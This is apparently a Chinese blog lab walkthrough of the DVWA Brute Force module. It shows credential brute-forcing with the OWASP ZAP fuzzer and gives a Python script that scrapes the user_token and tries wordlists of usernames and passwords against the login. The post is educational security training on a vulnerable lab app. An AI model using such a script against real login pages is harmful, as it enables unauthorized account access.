DVWA平台v1.9-Brute Force
2024-09-04 15:53:32
Low:
随便输一下用户名,密码,test
点击Login
显示用户名或密码错误
在owasp-zap查看数据包
点击,就会转到这
右键,点击Fuzz
点击Remove删除默认的
选定参数变量值,点击Add
再点击Add
然后输入几个可能的用户名,点击添加
然后点击ok
对password参数也是一样的操作,密码的字典
设置完了之后,点击Start Fuzzer
开始暴力破解
按Size Resp.Body可以更快地找到正确的结果
是正确的账号密码
Medium:
Medium级别的方法跟Low级别的方法一样,只不过响应的时间有点长
看一下源代码
可以看到,登陆失败的话,会睡眠2秒
High:
High等级用上面的方法爆破不出来,因为多了一个user_token参数
user_token是上次请求返回的
所以,右键查看源代码能得到下次请求的user_token
这次请求的源代码
下次请求的user_token
结果是一样的
写个python脚本爆破
__author__ = "MuT6 Sch01aR#" import requests import re username = ['root', 'admin', 'test'] password = ['123456', 'admin', 'admin888', 'root', 'abc123', 'password', 'qwerty'] cookie = {'security':'high','PHPSESSID':'ohjjiijt8p02u3adkoucjgqte1'} r = requests.get(url='http://192.168.2.140/dvwa/vulnerabilities/brute/?username=&password=&Login=Login&user_token=', cookies=cookie) r_esult = re.findall("<input type='hidden' name='user_token' value='(.*?)' />", r.text) user_token = r_esult[0] for u in username: for p in password: res = requests.get(url='http://192.168.2.140/dvwa/vulnerabilities/brute/?username='+u+'&password='+p+'&Login=Login&user_token='+user_token, cookies=cookie) re_sult = re.findall("<input type='hidden' name='user_token' value='(.*?)' />", res.text) user_token = re_sult[0] if 'Username and/or password incorrect.' in res.text: print("登录失败,账号:%s,密码:%s" %(u,p)) else: print("登陆成功,账号:%s,密码:%s" %(u,p))
要带上cookie
运行结果
最新文章
- 使用ngrok将内网映射为外网
- Java 批量插入数据(Oracle)
- 一、Hello World
- sql-schema与catalog
- 【转】UML类图几种关系的总结
- 使用File类递归列出E盘下全部文件
- max(min)-device-width和max(min)-width的区别
- flask-admin
- IIS报错 未将对象引用设置到对象的实例。
- Mvc Kissy uploader实现图片批量上传 附带瀑布流的照片墙
- 由json生成php配置文件
- 转:angular的decorator方法
- MVC3 Html.ActionLink
- owa_outlook暴力破解脚本
- VC 中使用 CToolTipCtrl 消失后不再出现的Bug。。。。
- HTTP Keep-Alive详解[转]
- Linux服务器病毒清理实践
- 分享一个大神自己的blog
- [Scala] 安装及环境配置(图文)
- 简述一下MVC和MVVM
热门文章
- uniqueidentifier in SQL becomes lower case in c#
- webview 详解
- php 策略模式案例
- WPF的Presenter(ContentPresenter)
- 小谈CSS定位
- Oracle Index Clustering Factor(集群因子)
- Maven下载 || 配置本地仓库 || IntelliJ IDEA配置Maven教程
- 条款35:考虑virtual函数以外的其他选择
- 2018.7.28 A murder that scandalised Harvard and the world
- 1.Linux和Unix区别